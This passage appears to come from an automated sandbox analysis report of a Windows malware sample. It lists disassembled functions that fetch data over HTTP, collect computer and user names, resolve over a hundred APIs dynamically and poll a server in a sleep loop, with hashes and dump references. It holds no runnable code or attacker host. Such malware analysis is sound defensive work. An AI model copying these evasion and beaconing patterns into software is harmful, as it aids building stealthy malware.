                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A763FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A7646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00A764EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00A764F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00A76503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 274589c5445d171c9d41792a794e0697e524f225ecc7565f15a28a4e95d447aa
                                  • Instruction ID: f804dd77b314b8bce77a0f614d37f35a7d24df553debbde1d7075b825a00a33b
                                  • Opcode Fuzzy Hash: 274589c5445d171c9d41792a794e0697e524f225ecc7565f15a28a4e95d447aa
                                  • Instruction Fuzzy Hash: 80714F71A00218ABEF24EFA0DD49FEE77B8BB44700F108199F109AB5D0DBB56A85CF51
                                  Function 00A878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1275 a878e0-a87937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 a87939-a8793e 1275->1276 1277 a87942-a87945 1275->1277 1278 a87962-a87972 1276->1278 1277->1278
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 8f88741216c634147681afa85c0c6fc063c2248432ebb20d0e2bbc1731aed34d
                                  • Instruction ID: 50e6b3d0eb1c8909134c0fa560a077a4b7c9a656c23f727736d1207ea4c48734
                                  • Opcode Fuzzy Hash: 8f88741216c634147681afa85c0c6fc063c2248432ebb20d0e2bbc1731aed34d
                                  • Instruction Fuzzy Hash: 7E01A9B1A04204EFC740DF94DD45FAEBBB8F704B21F104219F555E36C0D37559408BA1
                                  Function 00A87850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: e8c09e220b08f8781ef5b5a4a6c5a69032605db58eea88f8271bfae9dfe40828
                                  • Instruction ID: 79b7506ae8edbeebe402d208f4f4c01c9ed5d27d835b1152c61f3afb180fb895
                                  • Opcode Fuzzy Hash: e8c09e220b08f8781ef5b5a4a6c5a69032605db58eea88f8271bfae9dfe40828
                                  • Instruction Fuzzy Hash: 4DF04FB1944208ABC700DF98DD49FAEBBB8FB04711F10065AFA05A2680C77559048BA1
                                  Function 00A71160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: e93a74fa5e64b3a044bed4d863d12dfac3acd9617880cc21fb5fbf5270e4d7e3
                                  • Instruction ID: 308a9962e622f41d15a917c2dbd6d88cfb4d3e50480c5603c6907ace522de8e0
                                  • Opcode Fuzzy Hash: e93a74fa5e64b3a044bed4d863d12dfac3acd9617880cc21fb5fbf5270e4d7e3
                                  • Instruction Fuzzy Hash: 57D05E7490430CDBCB00DFE0DC497DDBBB8FB0C321F000698D90572340EA315481CAA6
                                  Function 00A89C10 Relevance: 235.2, APIs: 112, Strings: 22, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 a89c10-a89c1a 634 a89c20-a8a031 GetProcAddress * 43 633->634 635 a8a036-a8a0ca LoadLibraryA * 8 633->635 634->635 636 a8a0cc-a8a141 GetProcAddress * 5 635->636 637 a8a146-a8a14d 635->637 636->637 638 a8a153-a8a211 GetProcAddress * 8 637->638 639 a8a216-a8a21d 637->639 638->639 640 a8a298-a8a29f 639->640 641 a8a21f-a8a293 GetProcAddress * 5 639->641 642 a8a2a5-a8a332 GetProcAddress * 6 640->642 643 a8a337-a8a33e 640->643 641->640 642->643 644 a8a41f-a8a426 643->644 645 a8a344-a8a41a GetProcAddress * 9 643->645 646 a8a428-a8a49d GetProcAddress * 5 644->646 647 a8a4a2-a8a4a9 644->647 645->644 646->647 648 a8a4ab-a8a4d7 GetProcAddress * 2 647->648 649 a8a4dc-a8a4e3 647->649 648->649 650 a8a515-a8a51c 649->650 651 a8a4e5-a8a510 GetProcAddress * 2 649->651 652 a8a612-a8a619 650->652 653 a8a522-a8a60d GetProcAddress * 10 650->653 651->650 654 a8a61b-a8a678 GetProcAddress * 4 652->654 655 a8a67d-a8a684 652->655 653->652 654->655 656 a8a69e-a8a6a5 655->656 657 a8a686-a8a699 GetProcAddress 655->657 658 a8a708-a8a709 656->658 659 a8a6a7-a8a703 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(77190000,00675428), ref: 00A89C2D
                                  • GetProcAddress.KERNEL32(77190000,00675448), ref: 00A89C45
                                  • GetProcAddress.KERNEL32(77190000,00689080), ref: 00A89C5E
                                  • GetProcAddress.KERNEL32(77190000,00689050), ref: 00A89C76
                                  • GetProcAddress.KERNEL32(77190000,00688FC0), ref: 00A89C8E
                                  • GetProcAddress.KERNEL32(77190000,0068D530), ref: 00A89CA7
                                  • GetProcAddress.KERNEL32(77190000,0067A6B8), ref: 00A89CBF
                                  • GetProcAddress.KERNEL32(77190000,0068D500), ref: 00A89CD7
                                  • GetProcAddress.KERNEL32(77190000,0068D5C0), ref: 00A89CF0
                                  • GetProcAddress.KERNEL32(77190000,0068D560), ref: 00A89D08
                                  • GetProcAddress.KERNEL32(77190000,0068D4D0), ref: 00A89D20
                                  • GetProcAddress.KERNEL32(77190000,00675608), ref: 00A89D39
                                  • GetProcAddress.KERNEL32(77190000,006756A8), ref: 00A89D51
                                  • GetProcAddress.KERNEL32(77190000,00675648), ref: 00A89D69
                                  • GetProcAddress.KERNEL32(77190000,00675668), ref: 00A89D82
                                  • GetProcAddress.KERNEL32(77190000,0068D578), ref: 00A89D9A
                                  • GetProcAddress.KERNEL32(77190000,0068D440), ref: 00A89DB2
                                  • GetProcAddress.KERNEL32(77190000,0067A938), ref: 00A89DCB
                                  • GetProcAddress.KERNEL32(77190000,006753C8), ref: 00A89DE3
                                  • GetProcAddress.KERNEL32(77190000,0068D548), ref: 00A89DFB
                                  • GetProcAddress.KERNEL32(77190000,0068D590), ref: 00A89E14
                                  • GetProcAddress.KERNEL32(77190000,0068D4B8), ref: 00A89E2C
                                  • GetProcAddress.KERNEL32(77190000,0068D608), ref: 00A89E44
                                  • GetProcAddress.KERNEL32(77190000,006756C8), ref: 00A89E5D
                                  • GetProcAddress.KERNEL32(77190000,0068D368), ref: 00A89E75
                                  • GetProcAddress.KERNEL32(77190000,0068D620), ref: 00A89E8D
                                  • GetProcAddress.KERNEL32(77190000,0068D5A8), ref: 00A89EA6
                                  • GetProcAddress.KERNEL32(77190000,0068D428), ref: 00A89EBE
                                  • GetProcAddress.KERNEL32(77190000,0068D518), ref: 00A89ED6
                                  • GetProcAddress.KERNEL32(77190000,0068D5D8), ref: 00A89EEF
                                  • GetProcAddress.KERNEL32(77190000,0068D5F0), ref: 00A89F07
                                  • GetProcAddress.KERNEL32(77190000,0068D398), ref: 00A89F1F
                                  • GetProcAddress.KERNEL32(77190000,0068D458), ref: 00A89F38
                                  • GetProcAddress.KERNEL32(77190000,0067FD48), ref: 00A89F50
                                  • GetProcAddress.KERNEL32(77190000,0068D3F8), ref: 00A89F68
                                  • GetProcAddress.KERNEL32(77190000,0068D380), ref: 00A89F81
                                  • GetProcAddress.KERNEL32(77190000,00675708), ref: 00A89F99
                                  • GetProcAddress.KERNEL32(77190000,0068D338), ref: 00A89FB1
                                  • GetProcAddress.KERNEL32(77190000,006753A8), ref: 00A89FCA
                                  • GetProcAddress.KERNEL32(77190000,0068D470), ref: 00A89FE2
                                  • GetProcAddress.KERNEL32(77190000,0068D350), ref: 00A89FFA
                                  • GetProcAddress.KERNEL32(77190000,00675548), ref: 00A8A013
                                  • GetProcAddress.KERNEL32(77190000,006753E8), ref: 00A8A02B
                                  • LoadLibraryA.KERNEL32(0068D3B0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A03D
                                  • LoadLibraryA.KERNEL32(0068D3C8,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A04E
                                  • LoadLibraryA.KERNEL32(0068D3E0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A060
                                  • LoadLibraryA.KERNEL32(0068D4E8,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A072
                                  • LoadLibraryA.KERNEL32(0068D410,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A083
                                  • LoadLibraryA.KERNEL32(0068D488,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A095
                                  • LoadLibraryA.KERNEL32(0068D4A0,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A0A7
                                  • LoadLibraryA.KERNEL32(0068D710,?,00A85CA3,00A90AEB,?,?,?,?,?,?,?,?,?,?,00A90AEA,00A90AE3), ref: 00A8A0B8
                                  • GetProcAddress.KERNEL32(77040000,006750C8), ref: 00A8A0DA
                                  • GetProcAddress.KERNEL32(77040000,0068D680), ref: 00A8A0F2
                                  • GetProcAddress.KERNEL32(77040000,00688B38), ref: 00A8A10A
                                  • GetProcAddress.KERNEL32(77040000,0068D698), ref: 00A8A123
                                  • GetProcAddress.KERNEL32(77040000,006752A8), ref: 00A8A13B
                                  • GetProcAddress.KERNEL32(70630000,0067A668), ref: 00A8A160
                                  • GetProcAddress.KERNEL32(70630000,00675208), ref: 00A8A179
                                  • GetProcAddress.KERNEL32(70630000,0067A758), ref: 00A8A191
                                  • GetProcAddress.KERNEL32(70630000,0068D6E0), ref: 00A8A1A9
                                  • GetProcAddress.KERNEL32(70630000,0068D740), ref: 00A8A1C2
                                  • GetProcAddress.KERNEL32(70630000,00674FE8), ref: 00A8A1DA
                                  • GetProcAddress.KERNEL32(70630000,00675148), ref: 00A8A1F2
                                  • GetProcAddress.KERNEL32(70630000,0068D7D0), ref: 00A8A20B
                                  • GetProcAddress.KERNEL32(768D0000,00675288), ref: 00A8A22C
                                  • GetProcAddress.KERNEL32(768D0000,00675168), ref: 00A8A244
                                  • GetProcAddress.KERNEL32(768D0000,0068D6C8), ref: 00A8A25D
                                  • GetProcAddress.KERNEL32(768D0000,0068D6F8), ref: 00A8A275
                                  • GetProcAddress.KERNEL32(768D0000,00675008), ref: 00A8A28D
                                  • GetProcAddress.KERNEL32(75790000,0067A898), ref: 00A8A2B3
                                  • GetProcAddress.KERNEL32(75790000,0067A848), ref: 00A8A2CB
                                  • GetProcAddress.KERNEL32(75790000,0068D6B0), ref: 00A8A2E3
                                  • GetProcAddress.KERNEL32(75790000,00675048), ref: 00A8A2FC
                                  • GetProcAddress.KERNEL32(75790000,006751E8), ref: 00A8A314
                                  • GetProcAddress.KERNEL32(75790000,0067A730), ref: 00A8A32C
                                  • GetProcAddress.KERNEL32(75A10000,0068D788), ref: 00A8A352
                                  • GetProcAddress.KERNEL32(75A10000,006750E8), ref: 00A8A36A
                                  • GetProcAddress.KERNEL32(75A10000,00688C78), ref: 00A8A382
                                  • GetProcAddress.KERNEL32(75A10000,0068D758), ref: 00A8A39B
                                  • GetProcAddress.KERNEL32(75A10000,0068D728), ref: 00A8A3B3
                                  • GetProcAddress.KERNEL32(75A10000,006751C8), ref: 00A8A3CB
                                  • GetProcAddress.KERNEL32(75A10000,00675128), ref: 00A8A3E4
                                  • GetProcAddress.KERNEL32(75A10000,0068D638), ref: 00A8A3FC
                                  • GetProcAddress.KERNEL32(75A10000,0068D7E8), ref: 00A8A414
                                  • GetProcAddress.KERNEL32(76850000,006751A8), ref: 00A8A436
                                  • GetProcAddress.KERNEL32(76850000,0068D770), ref: 00A8A44E
                                  • GetProcAddress.KERNEL32(76850000,0068D7A0), ref: 00A8A466
                                  • GetProcAddress.KERNEL32(76850000,0068D7B8), ref: 00A8A47F
                                  • GetProcAddress.KERNEL32(76850000,0068D650), ref: 00A8A497
                                  • GetProcAddress.KERNEL32(75690000,00675228), ref: 00A8A4B8
                                  • GetProcAddress.KERNEL32(75690000,00675248), ref: 00A8A4D1
                                  • GetProcAddress.KERNEL32(769C0000,00674FC8), ref: 00A8A4F2
                                  • GetProcAddress.KERNEL32(769C0000,0068D668), ref: 00A8A50A
                                  • GetProcAddress.KERNEL32(6F8C0000,00675268), ref: 00A8A530
                                  • GetProcAddress.KERNEL32(6F8C0000,00675108), ref: 00A8A548
                                  • GetProcAddress.KERNEL32(6F8C0000,00675188), ref: 00A8A560
                                  • GetProcAddress.KERNEL32(6F8C0000,0068D128), ref: 00A8A579
                                  • GetProcAddress.KERNEL32(6F8C0000,00675348), ref: 00A8A591
                                  • GetProcAddress.KERNEL32(6F8C0000,00675068), ref: 00A8A5A9
                                  • GetProcAddress.KERNEL32(6F8C0000,00675088), ref: 00A8A5C2
                                  • GetProcAddress.KERNEL32(6F8C0000,00675028), ref: 00A8A5DA
                                  • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A8A5F1
                                  • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A8A607
                                  • GetProcAddress.KERNEL32(75D90000,0068D278), ref: 00A8A629
                                  • GetProcAddress.KERNEL32(75D90000,00688B48), ref: 00A8A641
                                  • GetProcAddress.KERNEL32(75D90000,0068D260), ref: 00A8A659
                                  • GetProcAddress.KERNEL32(75D90000,0068D0C8), ref: 00A8A672
                                  • GetProcAddress.KERNEL32(76470000,00675328), ref: 00A8A693
                                  • GetProcAddress.KERNEL32(70220000,0068D140), ref: 00A8A6B4
                                  • GetProcAddress.KERNEL32(70220000,006750A8), ref: 00A8A6CD
                                  • GetProcAddress.KERNEL32(70220000,0068D068), ref: 00A8A6E5
                                  • GetProcAddress.KERNEL32(70220000,0068D1E8), ref: 00A8A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: (Pg$(Qg$(Rg$(Sg$(Tg$HPg$HQg$HRg$HSg$HTg$HUg$HVg$HttpQueryInfoA$InternetSetOptionA$hPg$hQg$hRg$hVg$Og$Pg$Qg$Sg
                                  • API String ID: 2238633743-1928899926
                                  • Opcode ID: ebc7d19894625882505d419f58c4940e5c56f3160f38059496bd6eed2e38796f
                                  • Instruction ID: 018516d9a1223d3ab8d1c45453b800a1758b428defc346c87ddc4f57bf53adea
                                  • Opcode Fuzzy Hash: ebc7d19894625882505d419f58c4940e5c56f3160f38059496bd6eed2e38796f
                                  • Instruction Fuzzy Hash: 0B622BB5508200AFC754DFA9ED88B6E37F9F74C301F24871AA689D3674DA3A9841DF12
                                  Function 00A85510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 a85510-a85577 call a85ad0 call a8a820 * 3 call a8a740 * 4 817 a8557c-a85583 801->817 818 a85585-a855b6 call a8a820 call a8a7a0 call a71590 call a851f0 817->818 819 a855d7-a8564c call a8a740 * 2 call a71590 call a852c0 call a8a8a0 call a8a800 call a8aad0 StrCmpCA 817->819 835 a855bb-a855d2 call a8a8a0 call a8a800 818->835 845 a85693-a856a9 call a8aad0 StrCmpCA 819->845 849 a8564e-a8568e call a8a7a0 call a71590 call a851f0 call a8a8a0 call a8a800 819->849 835->845 850 a857dc-a85844 call a8a8a0 call a8a820 * 2 call a71670 call a8a800 * 4 call a86560 call a71550 845->850 851 a856af-a856b6 845->851 849->845 981 a85ac3-a85ac6 850->981 854 a857da-a8585f call a8aad0 StrCmpCA 851->854 855 a856bc-a856c3 851->855 874 a85991-a859f9 call a8a8a0 call a8a820 * 2 call a71670 call a8a800 * 4 call a86560 call a71550 854->874 875 a85865-a8586c 854->875 859 a8571e-a85793 call a8a740 * 2 call a71590 call a852c0 call a8a8a0 call a8a800 call a8aad0 StrCmpCA 855->859 860 a856c5-a85719 call a8a820 call a8a7a0 call a71590 call a851f0 call a8a8a0 call a8a800 855->860 859->854 960 a85795-a857d5 call a8a7a0 call a71590 call a851f0 call a8a8a0 call a8a800 859->960 860->854 874->981 881 a8598f-a85a14 call a8aad0 StrCmpCA 875->881 882 a85872-a85879 875->882 911 a85a28-a85a91 call a8a8a0 call a8a820 * 2 call a71670 call a8a800 * 4 call a86560 call a71550 881->911 912 a85a16-a85a21 Sleep 881->912 890 a8587b-a858ce call a8a820 call a8a7a0 call a71590 call a851f0 call a8a8a0 call a8a800 882->890 891 a858d3-a85948 call a8a740 * 2 call a71590 call a852c0 call a8a8a0 call a8a800 call a8aad0 StrCmpCA 882->891 890->881 891->881 986 a8594a-a8598a call a8a7a0 call a71590 call a851f0 call a8a8a0 call a8a800 891->986 911->981 912->817 960->854 986->881
                                  APIs
                                    • Part of subcall function 00A8A820: lstrlen.KERNEL32(00A74F05,?,?,00A74F05,00A90DDE), ref: 00A8A82B
                                    • Part of subcall function 00A8A820: lstrcpy.KERNEL32(00A90DDE,00000000), ref: 00A8A885
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A856A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85857
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85228
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85318
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A8532F
                                    • Part of subcall function 00A852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A85364
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A85383
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A853AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A8578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00A85A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
